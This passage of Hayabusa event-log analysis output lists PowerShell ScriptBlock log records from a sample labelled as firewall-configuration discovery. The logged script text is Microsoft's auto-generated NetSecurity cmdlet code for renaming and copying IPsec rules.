'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,"[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') 
-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network 
Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') 